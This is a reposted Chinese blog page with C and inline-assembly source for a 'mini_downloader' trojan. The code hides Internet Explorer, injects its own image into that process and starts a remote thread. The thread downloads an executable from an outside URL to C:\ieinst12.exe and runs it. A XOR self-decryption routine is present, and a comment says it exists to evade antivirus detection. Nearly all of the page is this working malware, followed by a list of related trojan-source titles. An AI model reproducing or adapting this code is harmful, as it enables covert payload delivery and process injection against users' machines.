无dll插入进程
来源:互联网 发布:淘宝卖家空间不足 编辑:程序博客网 时间:2024/05/16 15:53
/*
"mini_downloader"
code by kardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/opt:nowin98") //取消这4行的注释,可编译出2k大的文件
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/entry:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/base:0x13150000")
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );//动态加载shell32.dll中的shellexecutea函数
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);//动态加载urlmon.dll中的urldownloadtofilea函数
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); //建立远程线程,并运行
handle processhandle;
dword pid;
hinstance hshell,hurlmon,hkernel;
void download() //注入使用的下载函数
{
hshell=loadlibrary("shell32.dll");
hurlmon=loadlibrary("urlmon.dll");
(farproc&)shellrun=getprocaddress(hshell,"shellexecutea");
(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea");
downfile(null,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null);
shellrun(0,"open","c:\\ieinst12.exe",null,null,5);
exitprocess(0);
};
void main() //主函数
{
//1.得到ie路径,并运行
char iename[max_path],iepath[max_path];
zeromemory(iename,sizeof(iename));
zeromemory(iepath,sizeof(iepath));
getwindowsdirectory(iepath,max_path);
strncpy(iename,iepath,3);
strcat(iename,"program files\\internet explorer\\iexplore.exe");
winexec(iename,sw_hide);
sleep(500);
//2.得到 ie process handle
hwnd htemp;
htemp=findwindow("ieframe",null);
getwindowthreadprocessid(htemp,&pid);
processhandle=openprocess(process_all_access, false, pid);
//3.分配内存
hmodule module;
lpvoid newmodule;
dword size;
lpdword lpimagesize;
module = getmodulehandle(null);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
size=(dword)lpimagesize;
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); //确定起始基址和内存映像基址的位置
//4.写内存,创建线程
writeprocessmemory(processhandle, newmodule, module, size, null);//写数据
lpthread_start_routine entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=loadlibrary("kernel32.dll");
(farproc&)myinject= getprocaddress(hkernel,"createremotethread");
myinject(processhandle, null, 0, entrypoint, module, 0, null); //建立远程线程,并运行
//5.关闭对象
closehandle(processhandle);
return;
} ;
//解密函数
void decrpt()
{
handle myps;
dword oldattr;
byte shellcode[500];
zeromemory(shellcode,sizeof(shellcode));
myps=getcurrentprocess();
::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr);
//先把原代码,搬移到变量中保存起来
_asm
{
pushad;
lea esi,download
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;
};
//解密搬回
int i;
for (i=1;i<=0xff;i++)
{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;
};
//此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
__try
{
main();
return;
}
__except(exception_execute_handler)
{
};
}
return;
};
- 无dll插入进程
- 无Dll插入进程,下载者VC源代码
- 无Dll插入进程、下载者VC源代码
- 无dll插入进程,下载者vc源代码
- 无dll无进程木马
- 无进程DLL木马
- 无进程无DLL无硬盘文件
- 无dll无进程木马源代码
- 无Dll无进程木马源代码
- 无进程无dll后门byshell063.rar
- 无dll无进程木马源代码
- 无dll无进程木马源代码
- 无DLL远线程插入代码
- Byshell后门:无进程无DLL无硬盘文件
- dll插入系统进程的源码
- VC++实现无进程无dll线程注射技术
- 无进程无DLL无硬盘文件无启动项木马思路(转载)
- 无进程DLL木马的又一开发思路与实现
- Java线程
- 三星2K屏新机Galaxy S5 Prime曝光
- Dojo使用笔记
- 关于SQL Server中将数值类型转换为字符串的问题
- 程序员操作系统笔试题
- 无dll插入进程
- 软件测试基础知识
- vs2005 生成安装文件的方法
- 原型模式
- Yuhuan Paris Wedding Photography
- 使用WampServer搭建本地PHP环境,绑定域名,配置伪静态
- linux下的flashback脚本
- 8数码问题-深搜-广搜
- 策略模式在简单的商场收费软件中的应用